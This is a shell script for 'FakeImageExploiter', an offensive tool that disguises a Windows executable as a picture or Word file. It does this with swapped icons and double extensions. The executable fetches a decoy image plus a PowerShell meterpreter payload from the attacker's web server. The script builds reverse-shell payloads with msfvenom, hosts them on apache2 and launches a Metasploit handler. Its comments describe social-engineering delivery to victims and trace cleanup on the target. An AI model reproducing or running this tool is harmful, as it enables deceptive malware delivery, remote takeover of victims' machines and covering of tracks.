#!/bin/sh
##
# FakeImageExploiter v1.4 - agent.jpg.exe
# Version: v1.4 (Stable)
# CodeName: Metamorphosis
# Author: pedro ubuntu [ r00t-3xp10it ]
# Distros Supported : Linux Ubuntu, Kali, Mint, Parrot OS
# Suspicious-Shell-Activity (SSA) RedTeam develop @2017
#
# Description:
# This module takes one existing image.jpg and one payload.ps1 (input by user) and
# builds a new payload (agent.jpg.exe) that if executed it will trigger the download
# of the 2 previous files stored into apache2 webserver (image.jpg + payload.ps1).
# This module also changes the payload Icon to match the input image.jpg Then uses
# 'hides known file extensions' to hidde the .exe extension (final: agent.jpg.exe) ..
#
# Exploitation:
# agent.jpg.exe final binary should be deliver to target using social enginnering
# (apache2) As soon as the victim runs our executable, our picture will be downloaded
# and opened in the default picture viewer, our malicious payload will be executed,
# and we will get a meterpreter session.
#
# 'This tool also builds a cleaner.rc file to delete payloads left in target'
# Credits: https://null-byte.wonderhowto.com/how-to/hide-virus-inside-fake-picture-0168183
##
# resize terminal window [ milton@barra ] ..
resize -s 22 92 > /dev/null
#
# Colorise shell Script output leters
#
# Colors: populate the global ANSI colour prefixes used by the status lines.
# Each value is stored as the literal text "\033[..m" (no interpretation
# happens here; the echo at the call site expands the escape).
# Globals written: Escape, Reset, white, RedF, GreenF, YellowF, BlueF, CyanF.
# Returns: 0.
Colors() {
  Escape='\033'
  # "white" and "Reset" are the same attribute-reset sequence.
  Reset="${Escape}[0m"
  white="$Reset"
  RedF="${Escape}[31m"
  GreenF="${Escape}[32m"
  YellowF="${Escape}[33m"
  BlueF="${Escape}[34m"
  CyanF="${Escape}[36m"
}
#
# Framework variable declarations
#
VeR="1.3" # Framework version
ArCh=`arch` # store attackers system arch
IPATH=`pwd` # store Framework full path
HoME=`echo ~` # store home variable
CnA="Metamorphosis" # Framework codename display
DiStR0=`awk '{print $1}' /etc/issue` # grab distribution (Ubuntu | Kali | parrot)
InT3R=`netstat -r | grep "default" | awk {'print $8'}` # grab interface in use (wlan0 | eth0)
HkLm=`cat $HoME/.wine/system.reg | egrep -m 1 'ProductName' | cut -d '=' -f2 | cut -d '"' -f2` > /dev/null 2>&1 # wine windows version
#
# Read options (configurations) from settings file ..
#
bYR=`cat $IPATH/settings | egrep -m 1 "BYPASS_RH" | cut -d '=' -f2` > /dev/null 2>&1 # bypass resource hacker funtion?
EtU=`cat $IPATH/settings | egrep -m 1 "PICTURE_EXTENSION" | cut -d '=' -f2` > /dev/null 2>&1 # store extension to use
PaLe=`cat $IPATH/settings | egrep -m 1 "PAYLOAD_EXTENSION" | cut -d '=' -f2` > /dev/null 2>&1 # store extension to use
ApAc=`cat $IPATH/settings | egrep -m 1 "APACHE_WEBROOT" | cut -d '=' -f2` > /dev/null 2>&1 # store apache2 webroot
NoMsF=`cat $IPATH/settings | egrep -m 1 "NON_MSF_PAYLOADS" | cut -d '=' -f2` > /dev/null 2>&1 # stored from settings file
AuTo=`cat $IPATH/settings | egrep -m 1 "AUTO_PAYLOAD_BUILD" | cut -d '=' -f2` > /dev/null 2>&1 # stored from settings file
AhPu=`cat $IPATH/settings | egrep -m 1 "AGENT_HANDLER_PORT" | cut -d '=' -f2` > /dev/null 2>&1 # Agent/handler port
FwDc=`cat $IPATH/settings | egrep -m 1 "FAKE_WORD_DOC" | cut -d '=' -f2` > /dev/null 2>&1 # fake word doc builder
PuIa=`cat $IPATH/settings | egrep -m 1 "USE_PUBLIC_IP" | cut -d '=' -f2` > /dev/null 2>&1 # Use public ip addr?
PuiB=`cat $IPATH/settings | egrep -m 1 "EXTERNAL_IP" | cut -d '=' -f2` > /dev/null 2>&1 # Use public ip addr?
ChEk=`cat $IPATH/settings | egrep -m 1 "MSF_REBUILD" | cut -d '=' -f2` > /dev/null 2>&1 # rebuild metasploit db?
#
# Config user system correct arch
#
if [ "$ArCh" = "i386" ] || [ "$ArCh" = "i686" ]; then
dEd="x86"
arch="wine"
PgFi="Program Files"
ComP="i586-mingw32msvc-gcc"
elif [ "$ArCh" = "x86_64" ] || [ "ArCh" = "amd64" ]; then
dEd="x64"
arch="wine64"
PgFi="Program Files (x86)" # default value
ComP="i686-w64-mingw32-gcc"
else
dEd="x86"
arch="wine"
PgFi="Program Files"
ComP="i586-mingw32msvc-gcc"
fi
#
# Resource hacker install path (local)
#
RhI="$HoME/.wine/drive_c/$PgFi/Resource Hacker/ResourceHacker.exe"
#
# Grab Ip address to config apache2 URL and evil agent download URL
#
case $DiStR0 in
Kali) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}'`;;
Debian) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}'`;;
Mint) IP=`ifconfig $InT3R | egrep -w "inet" | awk '{print $2}' | cut -d ':' -f2`;;
Ubuntu) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | awk {'print $1'}`;;
Parrot) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
BackBox) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
elementary) IP=`ifconfig $InT3R | egrep -w "inet" | cut -d ':' -f2 | cut -d 'B' -f1`;;
*) IP=`zenity --title="☠ Input your IP addr ☠" --text "example: 192.168.1.68" --entry --width 300`;;
esac
clear
#
# Use your public ip addr to deliver payloads over wan ..
#
if [ "$PuIa" = "YES" ]; then
IP="$PuiB"
fi
#
# Check for dependencies Installed ..
# xterm, zenity, apache2, mingw32[64], ResourceHacker(wine)
#
Colors;
echo ${BlueF}[☆]${white} Checking backend applications ..${Reset};
sleep 1
#
# search for mingw32[64] intallation ..
# i586-mingw32msvc-gcc OR i686-w64-mingw32-gcc
#
apc=`which $ComP`
if [ "$?" != "0" ]; then
FaIl="YES"
echo ${RedF}[x]${white} mingw32[64] installation '->' not found!${Reset};
sleep 1
echo ${RedF}[x]${white} This script requires mingw32[64] to work${Reset};
echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
#
# Installing the correct arch GCC compiller
#
if [ "$dEd" = "x86" ]; then
echo ""
sudo apt-get install mingw32
echo ""
else
echo ""
sudo dpkg --add-architecture i386 && apt-get update && apt-get -y dist-upgrade --allow-downgrades && apt-get install -y mingw32 i586-mingw32msvc-gcc mingw-w64 i686-w64-mingw32-gcc
echo ""
fi
else
echo ${BlueF}[☆]${white}" mingw32 installation : ${GreenF}found!"${Reset};
sleep 1
fi
# search for wine intallation ..
apc=`which wine`
if [ "$?" != "0" ]; then
FaIl="YES"
echo ${RedF}[x]${white} Wine installation '->' not found!${Reset};
sleep 1
echo ${RedF}[x]${white} This script requires wine to work${Reset};
echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
echo ""
sudo apt-get install wine
echo ""
else
echo ${BlueF}[☆]${white}" Wine installation : ${GreenF}found!"${Reset};
sleep 1
fi
# search for xterm intallation ..
apc=`which xterm`
if [ "$?" != "0" ]; then
FaIl="YES"
echo ${RedF}[x]${white} Xterm installation '->' not found!${Reset};
sleep 1
echo ${RedF}[x]${white} This script requires xterm to work!${Reset};
echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
echo ""
sudo apt-get install xterm
echo ""
else
echo ${BlueF}[☆]${white}" Xterm installation : ${GreenF}found!"${Reset};
sleep 1
fi
# search for zenity intallation ..
apc=`which zenity`
if [ "$?" != "0" ]; then
FaIl="YES"
echo ${RedF}[x]${white} Zenity installation '->' not found!${Reset};
sleep 1
echo ${RedF}[x]${white} This script requires Zenity to work!${Reset};
echo ${YellowF}[☆] Please wait: installing missing dependencies ..${Reset};
echo ""
sudo apt-get install zenity
echo ""
else
echo ${BlueF}[☆]${white}" Zenity installation : ${GreenF}found!"${Reset};
sleep 1
fi
# search for: '.wine/drive_c/Program Files' folder ..
if [ -e "$HoME/.wine/drive_c/$PgFi" ]; then
echo ${BlueF}[☆]${white}" Wine $PgFi : ${GreenF}found!"${Reset};
sleep 1
else
FaIl="YES"
echo ${RedF}[x]${white} Wine: $PgFi '->' not found!${Reset};
sleep 2
echo ${GreenF}[☆]${white} Please wait, trying to build required folders ..!${Reset};
winecfg > /dev/null 2>&1
echo ""
echo ${RedF}Listing drive_c directorys: ${Reset};
ls $HoME/.wine/drive_c
echo ""
fi
#
# Restart tool after dependencies installs (FaIl="YES")
#
if [ "$FaIl" = "YES" ]; then
sleep 3
echo ${YellowF}[☆] FakeImageExploiter needs to restart to finish installs ..${Reset};
sleep 2
exit
fi
#
# Config WINE windows version (if not supported) ..
#
if ! [ "$HkLm" = "Microsoft Windows 7" ]; then
echo ${RedF}[x]${white} Wine system detected : ${RedF}$HkLm ${Reset};
echo ${RedF}[x]${white} FakeImageExploiter requires: ${GreenF}windows 7${white} version ..${Reset};
echo ${YellowF}[☆] Starting winecfg, Please sellect required version ..${Reset};
sleep 1
winecfg > /dev/null 2>&1
fi
#
# 1º BANNER DISPLAY (run or abort)
# HINT: This will give users the chance to abort tool
# execution, edit 'settings' file to use a diferent extension ..
#
clear
cat << !
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+---+
|F|a|k|e|I|m|a|g|e|E|x|p|l|o|i|t|e|r|:|$VeR|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-----+
Extension sellected: .$EtU (picture)
Extension sellected: .$PaLe (payload)
'Config settings file to use other extensions'
!
#
# Chose to run or to abort framework execution ..
# IF decided to run, start requiered services ..
#
rUn=$(zenity --question --title="☠ FakeImageExploiter ☠" --text "Execute framework?" --width 270) > /dev/null 2>&1
#
# check if settings file its proper configurated
#
if [ "$PaLe" = "exe" ] && [ "$AuTo" = "YES" ]; then
echo ${RedF}[x]${YellowF} "[settings] AUTO_PAYLOAD_BUILD=${RedF}$AuTo${YellowF} and PAYLOAD_EXTENSION=${RedF}$PaLe"${Reset};
sleep 2
echo ${RedF}[x]${YellowF} "Can ${RedF}NOT${YellowF} be used simultaneously, AUTO_PAYLOAD_BUILD does not build .exe binarys."${Reset};
exit
fi
if [ "$?" -eq "0" ]; then
service apache2 start | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Start apache2 webserver" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
# read NON-METASPLOIT payloads conf in 'settings' file ..
if ! [ "$NoMsF" = "YES" ]; then
service postgresql start | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Start Metasploit services" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
#
# rebuild msfdb ? (check settings file)
#
if [ "$ChEk" = "ON" ]; then
#
# start msfconsole to check postgresql connection status
#
service postgresql start
echo ${BlueF}[☆]${white}" Checking msfdb connection status .."${Reset};
ih=`msfconsole -q -x 'db_status; exit -y' | awk {'print $3'}`
if [ "$ih" != "connected" ]; then
echo ${RedF}[x]${white}" postgresql selected, no connection .."${Reset};
echo ${BlueF}[☆]${white}" Please wait, rebuilding msf database .."${Reset};
# rebuild msf database (database.yml)
msfdb reinit | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Rebuild metasploit database" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
echo ${GreenF}[✔]${white}" postgresql connected to msf .."${Reset};
sleep 2
else
echo ${GreenF}[✔]${white}" postgresql connected to msf .."${Reset};
sleep 2
fi
fi
fi
else
clear
echo ""
# Abort tool execution, lets chose another extension to use ..
echo ${white} Codename${RedF}::${white}$CnA ${Reset};
echo ${white} Author${RedF}::${white}pedr0 ubuntu${RedF}::${white}[r00t-3xp10it]${Reset};
echo ${white} FakeImageExploiter${RedF}::${white}v$VeR${RedF}::${white}SuspiciousShellActivity©${RedF}::${white}RedTeam${RedF}::${white}2017${Reset};
echo ""
# Stoping all services ..
service apache2 stop | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
if ! [ "$NoMsF" = "YES" ]; then
service postgresql stop | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
fi
exit
fi
#
# START OF THE 'REAL' FUNTIONS, Questions to user (zenity)
#
if [ "$AuTo" = "YES" ]; then
#
# AUTO_PAYLOAD_BUILD=YES (settings file conf) ..
# WARNING: This funtion only works if active in settings file ..
#
paylo=$(zenity --list --title "☠ AUTO-BUILD PAYLOAD ☠" --text "\nChose payload to build:" --radiolist --column "Pick" --column "Option" TRUE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/x64/meterpreter/reverse_tcp" FALSE "windows/x64/meterpreter/reverse_https" --width 350 --height 300) > /dev/null 2>&1
xterm -T " FakeImageExploiter - build payload: .$PaLe " -geometry 110x23 -e "sudo msfvenom -p $paylo LHOST=$IP LPORT=$AhPu -f psh-cmd -o $IPATH/output/chars.raw" > /dev/null 2>&1
# Inject shellcode into payload.ps1
cd $IPATH/output
str0=`cat chars.raw | awk {'print $12'}`
echo "pOwErShElL -noP -wIN 1 -nOnI -eN Sh33L" > payload.raw
sed "s|Sh33L|$str0|" payload.raw > payload.$PaLe
# Delete old conf files ..
rm payload.raw > /dev/null 2>&1
rm chars.raw > /dev/null 2>&1
cd $IPATH
else
# Orginal payload full-path variable
UpL=$(zenity --title "☠ PAYLOAD TO BE TRANSFORMED (only .$PaLe) ☠" --filename=$IPATH --file-selection --text "chose payload to be transformed") > /dev/null 2>&1
fi
sleep 1
# Orginal image.jpg full-path variable
JpG=$(zenity --title "☠ IMAGE TO BE USED (only .$EtU) ☠" --filename=$IPATH --file-selection --text "chose image to use.") > /dev/null 2>&1
sleep 1
#
# IF: FAKE_WORD_DOC=YES
#
if [ "$FwDc" = "YES" ]; then
PaTh="$IPATH/icons/Microsoft-Word.ico"
else
#
# Icon to use in agent.jpg.exe (RH auto-replacement)
# HINT: zenity displays will be based on picture inputed extension ..
#
if [ "$EtU" = "jpg" ]; then
IcOn=$(zenity --list --title "☠ ICON REPLACEMENT ☠" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "JPG-black.ico" FALSE "JPG-white.ico" FALSE "JPG-green.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
elif [ "$EtU" = "jpeg" ]; then
IcOn=$(zenity --list --title "☠ ICON REPLACEMENT ☠" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "JPEG-black.ico" FALSE "JPEG-white.ico" FALSE "JPEG-orange.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
elif [ "$EtU" = "png" ]; then
IcOn=$(zenity --list --title "☠ ICON REPLACEMENT ☠" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "PNG-black.ico" FALSE "PNG-white.ico" FALSE "PNG-simple.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
else
# I dont recognise the extension (picture) input by user ..
IcOn=$(zenity --list --title "☠ ICON REPLACEMENT ☠" --text "Chose one icon from the list." --radiolist --column "Pick" --column "Option" TRUE "JPG-Ios7.ico" FALSE "Microsoft-Word.ico" FALSE "Microsoft-Excel.ico" FALSE "Input your own icon" --width 330 --height 240) > /dev/null 2>&1
fi
#
# User have decided to input is own icon.ico file ..
# So, were is it ? (your icon.ico full path?) ..
#
if [ "$IcOn" = "Input your own icon" ]; then
ImR=$(zenity --title "☠ ICON REPLACEMENT ☠" --filename=$IPATH --file-selection --text "chose icon.ico to use") > /dev/null 2>&1
PaTh="$ImR"
else
PaTh="$IPATH/icons/$IcOn"
fi
fi
sleep 1
# Rename your agent (name.jpg.exe) ..
MiP=$(zenity --title "☠ PAYLOAD FINAL NAME ☠" --text "example: screenshot" --entry --width 300) > /dev/null 2>&1
clear
cat << !
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+---+
|F|a|k|e|I|m|a|g|e|E|x|p|l|o|i|t|e|r|:|$VeR|
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-----+
!
#
# Build/config evil agent C binary
# HINT: In reallity we are just using SED to config it ..
#
cd $IPATH/bin
echo ${BlueF}[☆]${white} Building : evil agent ..${Reset};
#
# If binary extension = exe then compile evil2.C [mascerano fix]
#
if [ "$PaLe" = "exe" ]; then
sed "s|LhOsT|$IP|g" evil2.c > evilcopy.c
sed -i "s|ScRee|$MiP.$EtU|g" evilcopy.c
sed -i "s|EhLh|$PaLe|g" evilcopy.c
sleep 2
else
sed "s|LhOsT|$IP|g" evil.c > evilcopy.c
sed -i "s|ScRee|$MiP.$EtU|g" evilcopy.c
sed -i "s|EhLh|$PaLe|g" evilcopy.c
sleep 2
fi
#
# Compiling agent using mingw32[64] (gcc)
# WARNING: this funtion only compiles 32bites payloads
# GCC : i586-mingw32msvc-gcc OR i686-w64-mingw32-gcc
#
echo ${BlueF}[☆]${white} Compiling: agent using mingw32 ..${Reset};
sleep 2
$ComP evilcopy.c -o trigger.exe -lws2_32 -mwindows
mv trigger.exe $IPATH/output/trigger.exe > /dev/null 2>&1
cd $IPATH
#
# Run or abort ResourceHacker usage (BYPASS_RH=YES)
# This funtion allow you to use another editor to change icons ..
#
if [ "$bYR" = "YES" ]; then
echo ${YellowF}[☆]${white} Manually change icon.ico sellected ..${Reset};
echo ${YellowF}[☆]${white} Use your favorite editor to change icon [trigger.exe]${Reset};
echo ${YellowF}[☠] When finish, press any key to Continue ..${Reset};
# Waiting for you to finish (read op) ..
read op
# Now, port the metamorphosis agent to output folder ..
mv $IPATH/output/trigger.exe $IPATH/output/agent.exe > /dev/null 2>&1
else
#
# Check for resource hacker installation (wine)
# Iam paranoic you know? i like to check twice just in case :D
#
if [ -f "$RhI" ]; then
echo ${BlueF}[☆]${white} ResourceHacker.exe: found ..${Reset};
sleep 1
#
# Wine command to call resourcehacker and add an icon.ico to the 'agent.exe'
#
echo ${BlueF}[☆]${white} Working: In backdoor agent ..${Reset};
$arch "$RhI" -open "$IPATH/output/trigger.exe" -save "$IPATH/output/agent.exe" -action addskip -res "$PaTh" -mask ICONGROUP,MAINICON,
echo ${BlueF}[☆]${white} Change : backdoor agent icons ..${Reset};
sleep 1
else
#
# Resource-Hacker Installation under WINE (the problem beggings) ..
# Lets hope everything its proper config before running this funtion ..
# OR this funtion will enter into a loop, unless (BYPASS_RH=YES) its active in settings file.
#
echo ${RedF}[x]${white} ResourceHacker.exe '->' not found!${Reset};
sleep 1
cat << !
Installing ResourceHacker under .wine directorys ..
Version:$HkLm Arch:$ArCh Folder:$PgFi
PATH:$RhI
!
sleep 3
# Installing Resource-Hacker.exe under wine ..
xterm -T "FakeImageExploiter" -geometry 90x26 -e "$arch $IPATH/bin/reshacker_setup.exe && sleep 3"
echo ${YellowF}[☆] Please wait, restarting tool ..${Reset};
echo ${YellowF}[☆] For proper ResourceHacker.exe Instalation!${Reset};
sleep 2
exit
fi
fi
#
# Change agent extension (spoof extension)
# TODO: Downside of RTLO, only last six caracters will be spoofed [no jpeg]
#
echo ${BlueF}[☆]${white} Change : backdoor agent extension ..${Reset};
mv $IPATH/output/agent.exe $IPATH/output/$MiP.$EtU.exe > /dev/null 2>&1
sleep 2
#
# Port to apache2 all files (zip agent.jpg.exe)
#
echo ${BlueF}[☆]${white} Port: all files to apache2 webserver ..${Reset};
#
# IF: AUTO_PAYLOAD_BUILD=YES
# Then port FakeImageExploiter build (payload.ps1) to apache2 ..
#
if [ "$AuTo" = "YES" ]; then
cp $IPATH/output/payload.$PaLe $ApAc/payload.$PaLe > /dev/null 2>&1
else
cp $UpL $ApAc/payload.$PaLe > /dev/null 2>&1
fi
cp $JpG $ApAc/$MiP.$EtU > /dev/null 2>&1
sleep 2
echo ${BlueF}[☆]${white} Creating: archive $MiP.zip ..${Reset};
cd $IPATH/output
# IF: FAKE_WORD_DOC=YES
if [ "$FwDc" = "YES" ]; then
# Zip it (to apache2 webserver delivery) ..
mv $MiP.$EtU.exe $MiP.docx.exe > /dev/null 2>&1
zip $MiP.zip $MiP.docx.exe > /dev/null 2>&1
mv $MiP.zip $ApAc/$MiP.zip > /dev/null 2>&1
else
# Zip it (to apache2 webserver delivery) ..
zip $MiP.zip $MiP.$EtU.exe > /dev/null 2>&1
mv $MiP.zip $ApAc/$MiP.zip > /dev/null 2>&1
fi
cd $IPATH
sleep 2
#
# Use your own binary (NON_MSF_PAYLOADS=YES)
# WARNING: You need to start your own handler to recibe the connection ..
# WARNING: If this funtion is active, then we will not build the cleaner.rc ..
# WARNING: This funtion will NOT work together with (AUTO_PAYLOAD_BUILD=YES) ..
#
if [ "$NoMsF" = "YES" ]; then
echo ${BlueF}[☠]${white} Metamorphosis: completed ..${Reset};
sleep 2
echo ${YellowF}[☠] Start your own handler now '(listener)' ..${Reset};
sleep 2
# Clean stuff (old config files)
rm $IPATH/bin/evilcopy.c > /dev/null 2>&1
rm $IPATH/output/trigger.exe > /dev/null 2>&1
# Attack vector (apache2 webserver)
echo ""
echo ${RedF}" ATTACK VECTOR: http://$IP/$MiP.zip"${Reset};
echo ${RedF}" AGENT: $IPATH/output/$MiP.$EtU.exe"${Reset};
echo ""
sleep 1
echo ${YellowF}[☠] When finish, press any key to Exit FakeImageExploiter ..${Reset};
# Waiting for you to finish (read op) ..
read op
else
#
# Build cleanner resource file (cleaner.rc)
# WARNING: This RC file must be called manually from meterpreter prompt
#
echo ${BlueF}[☆]${white} Creating: resource cleaner.rc ..${Reset};
sleep 2
cd $IPATH/bin
#
# If binary extension = exe then use cleaner2.rc
# This cleaner.rc will delete payload.ps1 and picture.jpg ..
#
if [ "$PaLe" = "exe" ]; then
sed "s|RffR|$PaLe|g" cleaner2.rc > copy.rc
sed -i "s|FaaF|$MiP|g" copy.rc
sed -i "s|AssA|$EtU|g" copy.rc
mv copy.rc $IPATH/output/cleaner.rc > /dev/null 2>&1
cd $IPATH
else
#
# This cleaner.rc only deletes picture.jpg from target ..
# Because all non-exe payloads will be executed in target RAM (dont touch disk).
#
sed "s|FaaF|$MiP|g" cleaner.rc > copy.rc
sed -i "s|AssA|$EtU|g" copy.rc
mv copy.rc $IPATH/output/cleaner.rc > /dev/null 2>&1
cd $IPATH
fi
#
# Start metasploit multi-handler ..
# WARNING: agent.jpg.exe will be ziped (zip) for apache2 use, because
# it raises less suspicious to use an URL http://IP/image.zip that
# use URL http://IP/image.jpg.exe to deliver payload using apache2
#
echo ${BlueF}[☠]${white} Metamorphosis: completed ..${Reset};
rm $IPATH/output/trigger.exe > /dev/null 2>&1
sleep 2
#
# IF: AUTO_PAYLOAD_BUILD=YES
# Then auto-config the handler [Metasploit] ..
#
if [ "$AuTo" = "YES" ]; then
lhost="$IP"
lport="$AhPu"
else
#
# Manually input handler settings [metasploit]
#
lhost=$(zenity --title="☠ Enter binary.exe LHOST ☠" --text "example: $IP" --entry --width 300) > /dev/null 2>&1
lport=$(zenity --title="☠ Enter binary.exe LPORT ☠" --text "example: $AhPu" --entry --width 300) > /dev/null 2>&1
# input the payload used (of your uploaded binary)
paylo=$(zenity --list --title "☠ FakeImageExploiter ☠" --text "\nChose payload used by binary.exe:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" FALSE "windows/x64/meterpreter/reverse_tcp" FALSE "windows/x64/meterpreter/reverse_https" --width 350 --height 350) > /dev/null 2>&1
fi
#
# Attack vector (apache2 webserver)
# HINT: with cleaner.rc resource file display ..
#
echo ""
echo ${RedF}" ATTACK VECTOR: http://$IP/$MiP.zip"${Reset};
if [ "$FwDc" = "YES" ]; then
echo ${RedF}" AGENT: $IPATH/output/$MiP.docx.exe"${Reset};
else
echo ${RedF}" AGENT: $IPATH/output/$MiP.$EtU.exe"${Reset};
fi
echo ${RedF}" CLEAN: meterpreter > resource $IPATH/output/cleaner.rc"${Reset};
sleep 1
# Start metasploit multi-handler ..
xterm -T " PAYLOAD MULTI-HANDLER " -geometry 110x23 -e "sudo msfconsole -x 'use exploit/multi/handler; set LHOST $lhost; set LPORT $lport; set PAYLOAD $paylo; exploit'"
fi
#
# Clean all things up ..
#
rm $ApAc/$MiP.$EtU > /dev/null 2>&1
rm $ApAc/$MiP.zip > /dev/null 2>&1
rm $ApAc/payload.$PaLe > /dev/null 2>&1
rm $ApAc/$MiP.$EtU.exe > /dev/null 2>&1
rm $IPATH/bin/evilcopy.c > /dev/null 2>&1
rm $IPATH/output/trigger.exe > /dev/null 2>&1
sleep 2
#
# Exit framework ..
#
echo ""
echo ${white} Codename${RedF}::${white}$CnA ${Reset};
echo ${white} Author${RedF}::${white}pedr0 ubuntu${RedF}::${white}[r00t-3xp10it]${Reset};
echo ${white} FakeImageExploiter${RedF}::${white}v$VeR${RedF}::${white}SuspiciousShellActivity©${RedF}::${white}RedTeam${RedF}::${white}2017${Reset};
sleep 1
# Stop services, And good nigth ..
service apache2 stop | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
if ! [ "$NoMsF" = "YES" ]; then
service postgresql stop | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
fi
exit